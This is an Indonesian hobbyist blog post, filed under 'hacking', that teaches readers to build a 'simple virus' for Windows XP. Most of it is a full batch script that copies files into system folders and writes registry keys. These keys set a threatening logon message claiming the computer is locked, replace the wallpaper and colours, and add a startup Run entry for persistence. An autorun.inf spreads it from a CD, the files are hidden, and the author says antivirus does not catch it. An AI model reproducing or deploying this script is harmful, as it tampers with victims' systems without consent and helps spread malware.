RSS

cara buat virus sederhana dari notepad

12 Feb

ini virus efeknya tidak t’lalu berbahaya….efek dari virus ini cuma mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!!😀😀 tapi yg penting gak ke-detect ama anti virus(setahu saya…..❓❓ )

note: “HANYA BEKERJA PADA WINDOWS XP” :

caranya:
– buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa) script di bawah ini:

@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

– lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
– buat Autorun.inf dengan script:

[autorun]
open=nama_file.bat

– lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
– file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
– copy file-file tsb ke CD
– nikmati efeknya

note:
– jangan disalahgunakan
– maaf kalau pernah diposting
– maaf lagi kalau salah tempat untuk posting,….maklum member baru and masih amatir😳 ….
– lagi-lagi maaf kalau ada yang salah, and mohon dikoreksi😳 ….
– kalau mau buat anti virusnya tinggal di modifikasi nilainya….

 
2 Komentar

Ditulis oleh pada 12 Februari 2011 in hacking

 

2 responses to “cara buat virus sederhana dari notepad

  1. Hisyam Hananto

    12 Februari 2011 at 09.05

    Woaww.. nanti gw coba..🙂

     
    • fauzanmaverick

      12 Februari 2011 at 09.28

      haha,,
      ok
      makasih udah lewat di blog ku
      wkwk

       

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: